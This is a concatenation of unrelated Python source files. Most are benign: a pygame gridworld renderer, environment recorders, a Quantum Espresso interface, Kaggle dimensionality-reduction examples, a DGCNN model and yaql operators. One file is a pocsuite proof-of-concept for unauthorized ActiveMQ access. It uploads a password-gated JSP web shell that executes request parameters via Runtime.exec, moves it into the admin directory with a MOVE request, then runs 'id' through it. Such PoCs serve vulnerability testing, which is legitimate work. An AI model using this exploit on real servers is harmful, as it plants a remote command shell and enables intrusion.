top_left_point = width_buffer + cell_width*i + 5, height_buffer + cell_height*j + 5
r = pygame.draw.rect(screen, (255, 255, 255), top_left_point + (cell_width-10, cell_height-10), 0)
text = reg_font.render("(wall)", True, (46, 49, 49))
screen.blit(text, (top_left_point[0] + 10, top_left_point[1] + 20))
if (i + 1, grid_mdp.height - j) in goal_locs:
# Draw goal.
circle_center = int(top_left_point[0] + cell_width/2.0), int(top_left_point[1] + cell_height/2.0)
circler_color = (154, 195, 157)
pygame.draw.circle(screen, circler_color, circle_center, int(min(cell_width, cell_height) / 3.0))
# Goal text.
text = reg_font.render("Goal", True, (46, 49, 49))
offset = int(min(cell_width, cell_height) / 3.0)
goal_text_point = circle_center[0] - font_size, circle_center[1] - font_size/1.5
screen.blit(text, goal_text_point)
pygame.display.flip()
raw_input("Press enter to exit: ")
|
crafter/recorder.py
|
kachayev/crafter
| 161 |
129424
|
<reponame>kachayev/crafter
import datetime
import json
import pathlib
import imageio
import numpy as np
class Recorder:
def __init__(
self, env, directory, save_stats=True, save_video=True,
save_episode=True, video_size=(512, 512)):
if directory and save_stats:
env = StatsRecorder(env, directory)
if directory and save_video:
env = VideoRecorder(env, directory, video_size)
if directory and save_episode:
env = EpisodeRecorder(env, directory)
self._env = env
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
class StatsRecorder:
def __init__(self, env, directory):
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._file = (self._directory / 'stats.jsonl').open('a')
self._length = None
self._reward = None
self._unlocked = None
self._stats = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._length = 0
self._reward = 0
self._unlocked = None
self._stats = None
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._length += 1
self._reward += info['reward']
if done:
self._stats = {'length': self._length, 'reward': round(self._reward, 1)}
for key, value in info['achievements'].items():
self._stats[f'achievement_{key}'] = value
self._save()
return obs, reward, done, info
def _save(self):
self._file.write(json.dumps(self._stats) + '\n')
self._file.flush()
class VideoRecorder:
def __init__(self, env, directory, size=(512, 512)):
if not hasattr(env, 'episode_name'):
env = EpisodeName(env)
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._size = size
self._frames = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._frames = [self._env.render(self._size)]
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._frames.append(self._env.render(self._size))
if done:
self._save()
return obs, reward, done, info
def _save(self):
filename = str(self._directory / (self._env.episode_name + '.mp4'))
imageio.mimsave(filename, self._frames)
class EpisodeRecorder:
def __init__(self, env, directory):
if not hasattr(env, 'episode_name'):
env = EpisodeName(env)
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._episode = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._episode = [{'image': obs}]
return obs
def step(self, action):
# Transitions are defined from the environment perspective, meaning that a
# transition contains the action and the resulting reward and next
# observation produced by the environment in response to said action.
obs, reward, done, info = self._env.step(action)
transition = {
'action': action, 'image': obs, 'reward': reward, 'done': done,
}
for key, value in info.items():
if key in ('inventory', 'achievements'):
continue
transition[key] = value
for key, value in info['achievements'].items():
transition[f'achievement_{key}'] = value
for key, value in info['inventory'].items():
transition[f'ainventory_{key}'] = value
self._episode.append(transition)
if done:
self._save()
return obs, reward, done, info
def _save(self):
filename = str(self._directory / (self._env.episode_name + '.npz'))
# Fill in zeros for keys missing at the first time step.
for key, value in self._episode[1].items():
if key not in self._episode[0]:
self._episode[0][key] = np.zeros_like(value)
episode = {
k: np.array([step[k] for step in self._episode])
for k in self._episode[0]}
np.savez_compressed(filename, **episode)
class EpisodeName:
def __init__(self, env):
self._env = env
self._timestamp = None
self._unlocked = None
self._length = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._timestamp = None
self._unlocked = None
self._length = 0
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._length += 1
if done:
self._timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
self._unlocked = sum(int(v >= 1) for v in info['achievements'].values())
return obs, reward, done, info
@property
def episode_name(self):
return f'{self._timestamp}-ach{self._unlocked}-len{self._length}'
|
flare/dft_interface/qe_util.py
|
aaronchen0316/flare
| 144 |
129437
|
"""
This module is used to call Quantum Espresso simulation and parse its output
The user need to supply a complete input script with single-point scf
calculation, CELL_PARAMETERS, ATOMIC_POSITIONS, nat, ATOMIC_SPECIES
arguments. It is case sensitive. and the nat line should be the first
argument of the line it appears. The user can also opt to the ASE interface instead.
This module will copy the input template to a new file with "_run" suffix,
edit the atomic coordination in the ATOMIC_POSITIONS block and run the similation with the parallel set up given.
"""
import os
from subprocess import call
import time
import numpy as np
from flare import struc
from typing import List
name = "QE"
def run_dft_par(
dft_input,
structure,
dft_loc,
n_cpus=1,
dft_out="pwscf.out",
npool=None,
mpi="mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
and atomic configurations. if n_cpus == 1, it executes serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param n_cpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces
"""
newfilename = edit_dft_input_positions(dft_input, structure)
if npool is None:
dft_command = f"{dft_loc} -i {newfilename}"
else:
dft_command = f"{dft_loc} -nk {npool} -i {newfilename}"
if n_cpus > 1:
if mpi == "mpi":
dft_command = f"mpirun -np {n_cpus} {dft_command}"
else:
dft_command = f"srun -n {n_cpus} --mpi=pmi2 {dft_command}"
with open(dft_out, "w+") as fout:
call(dft_command.split(), stdout=fout)
os.remove(newfilename)
return parse_dft_forces(dft_out)
def run_dft_en_par(dft_input, structure, dft_loc, n_cpus):
"""run DFT calculation with given input template
and atomic configurations. This function is not used atm
if n_cpus == 1, it executes serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param n_cpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces, energy
"""
run_qe_path = dft_input
edit_dft_input_positions(run_qe_path, structure)
qe_command = "mpirun -np {n_cpus} {dft_loc} -i {run_qe_path}"
with open("pwscf.out", "w+") as fout:
call(qe_command.split(), stdout=fout)
forces, energy = parse_dft_forces_and_energy("pwscf.out")
return forces, energy
def run_dft_en_npool(qe_input, structure, dft_loc, npool):
run_qe_path = qe_input
edit_dft_input_positions(run_qe_path, structure)
qe_command = "mpirun {0} -npool {1} < {2} > {3}".format(
dft_loc, npool, run_qe_path, "pwscf.out"
)
call(qe_command, shell=True)
forces, energy = parse_dft_forces_and_energy("pwscf.out")
return forces, energy
def parse_dft_input(dft_input: str):
"""parse the input to get information of atomic configuration
:param dft_input: input file name
:return: positions, species, cell, masses
"""
positions = []
species = []
cell = []
with open(dft_input) as f:
lines = f.readlines()
# Find the cell and positions in the output file
cell_index = None
positions_index = None
nat = None
species_index = None
for i, line in enumerate(lines):
if "CELL_PARAMETERS" in line:
cell_index = int(i + 1)
if "ATOMIC_POSITIONS" in line:
positions_index = int(i + 1)
if "nat" in line:
nat = int(line.split("=")[1])
if "ATOMIC_SPECIES" in line:
species_index = int(i + 1)
assert cell_index is not None, "Failed to find cell in input"
assert positions_index is not None, "Failed to find positions in input"
assert nat is not None, "Failed to find number of atoms in input"
assert species_index is not None, "Failed to find atomic species in input"
# Load cell
for i in range(cell_index, cell_index + 3):
cell_line = lines[i].strip()
cell.append(np.fromstring(cell_line, sep=" "))
cell = np.array(cell)
# Check cell IO
assert len(cell) != 0, "Cell failed to load"
assert np.shape(cell) == (3, 3), "Cell failed to load correctly"
# Load positions
for i in range(positions_index, positions_index + nat):
line_string = lines[i].strip().split()
species.append(line_string[0])
pos_string = " ".join(line_string[1:4])
positions.append(np.fromstring(pos_string, sep=" "))
# Check position IO
assert positions != [], "Positions failed to load"
positions = np.array(positions)
# see conversions.nb for conversion from amu to md units
massconvert = 0.000103642695727
masses = {}
for i in range(species_index, species_index + len(set(species))):
# Expects lines of format like: H 1.0 H_pseudo_name.ext
line = lines[i].strip().split()
masses[line[0]] = float(line[1]) * massconvert
return positions, species, cell, masses
def dft_input_to_structure(dft_input: str):
"""Parses a qe input and returns the atoms in the
file as a Structure object
:param dft_input: QE Input file to parse
:return: class Structure
"""
positions, species, cell, masses = parse_dft_input(dft_input)
_, coded_species = struc.get_unique_species(species)
return struc.Structure(
positions=positions,
species=coded_species,
cell=cell,
mass_dict=masses,
species_labels=species,
)
def edit_dft_input_positions(dft_input: str, structure):
"""
Write the current configuration of the OTF structure to the
qe input file
:param dft_input: dft input file name
:param structure: atomic structure to compute
:return: the name of the edited file
"""
with open(dft_input, "r") as f:
lines = f.readlines()
file_pos_index = None
cell_index = None
nat = None
for i, line in enumerate(lines):
if "ATOMIC_POSITIONS" in line:
file_pos_index = int(i + 1)
if "CELL_PARAMETERS" in line:
cell_index = int(i + 1)
# Load nat into variable then overwrite it with new nat
if "nat" in line:
nat = int(line.split("=")[1])
nat_index = int(i)
lines[nat_index] = "nat = " + str(structure.nat) + "\n"
assert file_pos_index is not None, "Failed to find positions in input"
assert cell_index is not None, "Failed to find cell in input"
assert nat is not None, "Failed to find nat in input"
# TODO Catch case where the punchout structure has more atoms than the
# original structure
for pos_index, line_index in enumerate(
range(file_pos_index, file_pos_index + structure.nat)
):
pos_string = " ".join(
[
structure.species_labels[pos_index],
str(structure.positions[pos_index][0]),
str(structure.positions[pos_index][1]),
str(structure.positions[pos_index][2]),
]
)
if line_index < len(lines):
lines[line_index] = str(pos_string + "\n")
else:
lines.append(str(pos_string + "\n"))
# TODO current assumption: if there is a new structure, then the new
# structure has fewer atoms than the previous one. If we are always
# 'editing' a version of the larger structure than this will be okay with
# the punchout method.
for line_index in range(file_pos_index + structure.nat, file_pos_index + nat):
lines[line_index] = ""
lines[cell_index] = " ".join([str(x) for x in structure.vec1]) + "\n"
lines[cell_index + 1] = " ".join([str(x) for x in structure.vec2]) + "\n"
lines[cell_index + 2] = " ".join([str(x) for x in structure.vec3]) + "\n"
newfilename = dft_input + "_run"
with open(newfilename, "w") as f:
for line in lines:
f.write(line)
return newfilename
def parse_dft_forces(outfile: str):
"""
Get forces from a pwscf file in eV/A
:param outfile: str, Path to pwscf output file
:return: list[nparray] , List of forces acting on atoms
"""
forces = []
total_energy = np.nan
with open(outfile, "r") as outf:
for line in outf:
if line.lower().startswith("! total energy"):
total_energy = float(line.split()[-2])
if line.find("force") != -1 and line.find("atom") != -1:
line = line.split("force =")[-1]
line = line.strip()
line = line.split(" ")
line = [x for x in line if x != ""]
temp_forces = []
for x in line:
temp_forces.append(float(x))
forces.append(np.array(list(temp_forces)))
assert (
total_energy != np.nan
), "Quantum ESPRESSO parser failed to read the file {}. Run failed.".format(outfile)
# Convert from ry/au to ev/angstrom
conversion_factor = 25.71104309541616
forces = [conversion_factor * force for force in forces]
forces = np.array(forces)
return forces
def parse_dft_forces_and_energy(outfile: str):
"""
Get forces from a pwscf file in eV/A
:param outfile: str, Path to pwscf output file
:return: list[nparray] , List of forces acting on atoms
"""
forces = []
total_energy = np.nan
with open(outfile, "r") as outf:
for line in outf:
if line.lower().startswith("! total energy"):
total_energy = float(line.split()[-2])
if line.find("force") != -1 and line.find("atom") != -1:
line = line.split("force =")[-1]
line = line.strip()
line = line.split(" ")
line = [x for x in line if x != ""]
temp_forces = []
for x in line:
temp_forces.append(float(x))
forces.append(np.array(list(temp_forces)))
assert (
total_energy != np.nan
), "Quantum ESPRESSO parser failed to read the file {}. Run failed.".format(outfile)
# Convert from ry/au to ev/angstrom
conversion_factor = 25.71104309541616
forces = [conversion_factor * force for force in forces]
forces = np.array(forces)
return forces, total_energy
|
ch03/ch03-05-reduction.py
|
makinzm/kagglebook
| 470 |
129441
|
<gh_stars>100-1000
# ---------------------------------
# データ等の準備
# ----------------------------------
import numpy as np
import pandas as pd
# train_xは学習データ、train_yは目的変数、test_xはテストデータ
# pandasのDataFrame, Seriesで保持します。(numpyのarrayで保持することもあります)
train = pd.read_csv('../input/sample-data/train_preprocessed_onehot.csv')
train_x = train.drop(['target'], axis=1)
train_y = train['target']
test_x = pd.read_csv('../input/sample-data/test_preprocessed_onehot.csv')
# 説明用に学習データとテストデータの元の状態を保存しておく
train_x_saved = train_x.copy()
test_x_saved = test_x.copy()
from sklearn.preprocessing import StandardScaler, MinMaxScaler
# 標準化を行った学習データとテストデータを返す関数
def load_standarized_data():
train_x, test_x = train_x_saved.copy(), test_x_saved.copy()
scaler = StandardScaler()
scaler.fit(train_x)
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
return pd.DataFrame(train_x), pd.DataFrame(test_x)
# MinMaxスケーリングを行った学習データとテストデータを返す関数
def load_minmax_scaled_data():
train_x, test_x = train_x_saved.copy(), test_x_saved.copy()
# Min-Max Scalingを行う
scaler = MinMaxScaler()
scaler.fit(pd.concat([train_x, test_x], axis=0))
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
return pd.DataFrame(train_x), pd.DataFrame(test_x)
# -----------------------------------
# PCA
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
# PCA
from sklearn.decomposition import PCA
# データは標準化などのスケールを揃える前処理が行われているものとする
# 学習データに基づいてPCAによる変換を定義
pca = PCA(n_components=5)
pca.fit(train_x)
# 変換の適用
train_x = pca.transform(train_x)
test_x = pca.transform(test_x)
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
# TruncatedSVD
from sklearn.decomposition import TruncatedSVD
# データは標準化などのスケールを揃える前処理が行われているものとする
# 学習データに基づいてSVDによる変換を定義
svd = TruncatedSVD(n_components=5, random_state=71)
svd.fit(train_x)
# 変換の適用
train_x = svd.transform(train_x)
test_x = svd.transform(test_x)
# -----------------------------------
# NMF
# -----------------------------------
# 非負の値とするため、MinMaxスケーリングを行ったデータを用いる
train_x, test_x = load_minmax_scaled_data()
# -----------------------------------
from sklearn.decomposition import NMF
# データは非負の値から構成されているとする
# 学習データに基づいてNMFによる変換を定義
model = NMF(n_components=5, init='random', random_state=71)
model.fit(train_x)
# 変換の適用
train_x = model.transform(train_x)
test_x = model.transform(test_x)
# -----------------------------------
# LatentDirichletAllocation
# -----------------------------------
# MinMaxスケーリングを行ったデータを用いる
# カウント行列ではないが、非負の値であれば計算は可能
train_x, test_x = load_minmax_scaled_data()
# -----------------------------------
from sklearn.decomposition import LatentDirichletAllocation
# データは単語文書のカウント行列などとする
# 学習データに基づいてLDAによる変換を定義
model = LatentDirichletAllocation(n_components=5, random_state=71)
model.fit(train_x)
# 変換の適用
train_x = model.transform(train_x)
test_x = model.transform(test_x)
# -----------------------------------
# LinearDiscriminantAnalysis
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
# データは標準化などのスケールを揃える前処理が行われているものとする
# 学習データに基づいてLDAによる変換を定義
lda = LDA(n_components=1)
lda.fit(train_x, train_y)
# 変換の適用
train_x = lda.transform(train_x)
test_x = lda.transform(test_x)
# -----------------------------------
# t-sne
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
import bhtsne
# データは標準化などのスケールを揃える前処理が行われているものとする
# t-sneによる変換
data = pd.concat([train_x, test_x])
embedded = bhtsne.tsne(data.astype(np.float64), dimensions=2, rand_seed=71)
# -----------------------------------
# UMAP
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
import umap
# データは標準化などのスケールを揃える前処理が行われているものとする
# 学習データに基づいてUMAPによる変換を定義
um = umap.UMAP()
um.fit(train_x)
# 変換の適用
train_x = um.transform(train_x)
test_x = um.transform(test_x)
# -----------------------------------
# クラスタリング
# -----------------------------------
# 標準化されたデータを用いる
train_x, test_x = load_standarized_data()
# -----------------------------------
from sklearn.cluster import MiniBatchKMeans
# データは標準化などのスケールを揃える前処理が行われているものとする
# 学習データに基づいてMini-Batch K-Meansによる変換を定義
kmeans = MiniBatchKMeans(n_clusters=10, random_state=71)
kmeans.fit(train_x)
# 属するクラスタを出力する
train_clusters = kmeans.predict(train_x)
test_clusters = kmeans.predict(test_x)
# 各クラスタの中心までの距離を出力する
train_distances = kmeans.transform(train_x)
test_distances = kmeans.transform(test_x)
|
macadam/sl/s04_dgcnn.py
|
yongzhuo/Macadam
| 290 |
129455
|
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/12 22:46
# @author : Mo
# @function: DGCNN(Dilate Gated Convolutional Neural Network, 即"膨胀门卷积神经网络", IDCNN + CRF)
# @url : Multi-Scale Context Aggregation by Dilated Convolutions(https://arxiv.org/abs/1511.07122)
from bert4keras.layers import ConditionalRandomField
from macadam import keras, K, O, C, L, M
from macadam.base.graph import graph
class DGCNNGraph(graph):
def __init__(self, hyper_parameters):
"""
Init of hyper_parameters and build_embed.
Args:
hyper_parameters: hyper_parameters of all, which contains "sharing", "embed", "graph", "train", "save" and "data".
Returns:
None
"""
super().__init__(hyper_parameters)
self.atrous_rates = hyper_parameters["graph"].get("atrous_rates", [2, 1, 2]) # 1, 2, 3
self.crf_lr_multiplier = hyper_parameters.get("train", {}).get("crf_lr_multiplier",
1 if self.embed_type in ["WARD", "RANDOM"] else 3200)
def build_model(self, inputs, outputs):
"""
build_model.
Args:
inputs: tensor, input of model
outputs: tensor, output of model
Returns:
None
"""
# CNN, 提取n-gram特征和最大池化, DGCNN膨胀卷积(IDCNN)
conv_pools = []
for i in range(len(self.filters_size)):
conv = L.Conv1D(name="conv-{0}-{1}".format(i, self.filters_size[i]),
dilation_rate=self.atrous_rates[0],
kernel_size=self.filters_size[i],
activation=self.activate_mid,
filters=self.filters_num,
padding="SAME",
)(outputs)
for j in range(len(self.atrous_rates) - 1):
conv = L.Conv1D(name="conv-{0}-{1}-{2}".format(i, self.filters_size[i], j),
dilation_rate=self.atrous_rates[j],
kernel_size=self.filters_size[i],
activation=self.activate_mid,
filters=self.filters_num,
padding="SAME",
)(conv)
conv = L.Dropout(name="dropout-{0}-{1}-{2}".format(i, self.filters_size[i], j),
rate=self.dropout,)(conv)
conv_pools.append(conv)
# 拼接
x = L.Concatenate(axis=-1)(conv_pools)
x = L.Dropout(self.dropout)(x)
# CRF or Dense
if self.use_crf:
x = L.Dense(units=self.label, activation=self.activate_end)(x)
self.CRF = ConditionalRandomField(self.crf_lr_multiplier, name="crf_bert4keras")
self.outputs = self.CRF(x)
self.trans = K.eval(self.CRF.trans).tolist()
self.loss = self.CRF.dense_loss if self.use_onehot else self.CRF.sparse_loss
self.metrics = [self.CRF.dense_accuracy if self.use_onehot else self.CRF.sparse_accuracy]
else:
x = L.Bidirectional(L.GRU(activation=self.activate_mid,
return_sequences=True,
units=self.rnn_unit,
name="bi-gru",)
)(x)
self.outputs = L.TimeDistributed(L.Dense(activation=self.activate_end,
name="dense-output",
units=self.label,))(x)
self.model = M.Model(inputs, self.outputs)
self.model.summary(132)
|
plynx/base/resource.py
|
khaxis/plynx
| 137 |
129463
|
"""Templates for PLynx Resources and utils."""
from collections import namedtuple
from typing import Dict
from plynx.constants import NodeResources
PreviewObject = namedtuple('PreviewObject', ['fp', 'resource_id'])
def _force_decode(byte_array):
try:
return byte_array.decode("utf-8")
except UnicodeDecodeError:
return f"# not a UTF-8 sequence:\n{byte_array}"
return "Failed to decode the sequence"
class BaseResource:
"""Base Resource class"""
DISPLAY_RAW: bool = False
def __init__(self):
pass
@staticmethod
def prepare_input(filename: str, preview: bool = False) -> Dict[str, str]: # pylint: disable=unused-argument
"""Resource preprocessor"""
return {NodeResources.INPUT: filename}
@staticmethod
def prepare_output(filename: str, preview: bool = False) -> Dict[str, str]:
"""Prepare output"""
if not preview:
# Create file
with open(filename, 'a'):
pass
return {NodeResources.OUTPUT: filename}
@staticmethod
def postprocess_output(filename: str) -> str:
"""Resource postprocessor"""
return filename
@classmethod
def preview(cls, preview_object: PreviewObject) -> str:
"""Preview Resource"""
# TODO escape html code for security reasons
data = _force_decode(preview_object.fp.read())
return f"<pre>{data}</pre>"
|
yaql/standard_library/common.py
|
nzlosh/yaql
| 112 |
129467
|
<reponame>nzlosh/yaql
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common module describes comparison operators for different types. Comparing
with null value is considered separately.
"""
from yaql.language import specs
@specs.name('*equal')
def eq(left, right):
""":yaql:operator =
Returns true if left and right are equal, false otherwise.
It is system function and can be used to override behavior
of comparison between objects.
"""
return left == right
@specs.name('*not_equal')
def neq(left, right):
""":yaql:operator !=
Returns true if left and right are not equal, false otherwise.
It is system function and can be used to override behavior
of comparison between objects.
"""
return left != right
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<')
def left_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left is not null and
right is null.
:signature: left < right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 < null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<=')
def left_lte_null(left, right):
""":yaql:operator <=
Returns false. This function is called when left is not null
and right is null.
:signature: left <= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 <= null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>')
def left_gt_null(left, right):
""":yaql:operator >
Returns true. This function is called when left is not null
and right is null.
:signature: left > right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 > null
true
"""
return True
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>=')
def left_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left is not null
and right is null.
:signature: left >= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 >= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<')
def null_lt_right(left, right):
""":yaql:operator <
Returns true. This function is called when left is null and
right is not.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null < 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<=')
def null_lte_right(left, right):
""":yaql:operator <=
Returns true. This function is called when left is null and
right is not.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null <= 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>')
def null_gt_right(left, right):
""":yaql:operator >
Returns false. This function is called when left is null and right
is not.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null > 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>=')
def null_gte_right(left, right):
""":yaql:operator >=
Returns false. This function is called when left is null and
right is not.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null >= 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<')
def null_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left and right are null.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null < null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<=')
def null_lte_null(left, right):
""":yaql:operator <=
Returns true. This function is called when left and right are null.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null <= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>')
def null_gt_null(left, right):
""":yaql:operator >
Returns false. This function is called when left and right are null.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null > null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>=')
def null_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left and right are null.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null >= null
true
"""
return True
def register(context):
context.register_function(eq)
context.register_function(neq)
context.register_function(left_lt_null)
context.register_function(left_lte_null)
context.register_function(left_gt_null)
context.register_function(left_gte_null)
context.register_function(null_lt_right)
context.register_function(null_lte_right)
context.register_function(null_gt_right)
context.register_function(null_gte_right)
context.register_function(null_lt_null)
context.register_function(null_lte_null)
context.register_function(null_gt_null)
context.register_function(null_gte_null)
|
vul/32-ActiveMQ-unauthorized-access.py
|
zx273983653/vulscan
| 582 |
129476
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class ActiveMQPOC(POCBase):
vulID = '32' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2018-06-05' #漏洞公开的时间,不知道就写今天
author = 'arr0w1' # PoC作者的大名
createDate = '2018-06-05'# 编写 PoC 的日期
updateDate = '2018-06-05'# PoC 更新的时间,默认和编写时间一样
references = 'https://help.aliyun.com/knowledge_detail/50436.html'# 漏洞地址来源,0day不用写
name = 'ActiveMQ Unauthorized access'# PoC 名称
appPowerLink = ''# 漏洞厂商主页地址
appName = 'ActiveMQ'# 漏洞应用名称
appVersion = 'all versions'# 漏洞影响版本
vulType = 'Command Execution'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
ActiveMQ 未授权访问漏洞
''' # 漏洞简要描述
samples = []# 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
#验证漏洞 pocsuite -r 32-ActiveMQ-unauthorized-access.py -u 127.0.0.1 --verify
def _verify(self):
#定义返回结果
return self._attack()
#漏洞攻击
def _attack(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = '8161'
#检测漏洞
url = 'http://%s:%s'%(_host,_port)
# print url
try:
get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
res = req.put(url=get_fileserver_path_url, timeout=5, allow_redirects=False)
# print res.reason
path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0]
# print path
put_jsp_url = url + '/fileserver/haha.jsp'
jsp_data = '''
<%
if("sec".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
'''
res = req.put(url=put_jsp_url, timeout=5, allow_redirects=False, data = jsp_data)
if res.status_code == 204:
# print 'ok'
headers = {
'Destination': 'file://'+path+'admin/haha.jsp'
}
res = req.request('move', url=put_jsp_url, timeout=5, allow_redirects=False, headers=headers)
if res.status_code == 204:
# print 'ok'
exploit_url = url + '/admin/haha.jsp?pwd=<PASSWORD>&i=id'
res = req.get(url=exploit_url, timeout=5, allow_redirects=False)
if 'uid' in res.text:
id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
print id_info
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = exploit_url
except Exception as e:
print e
return self.save_output(result)
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(ActiveMQPOC)
|
app/master/subjob.py
|
rsennewald/ClusterRunner
| 164 |
129502
|
import os
from typing import List
from app.common.build_artifact import BuildArtifact
from app.master.atom import AtomState
from app.util.conf.configuration import Configuration
from app.util.log import get_logger
from app.util.pagination import get_paginated_indices
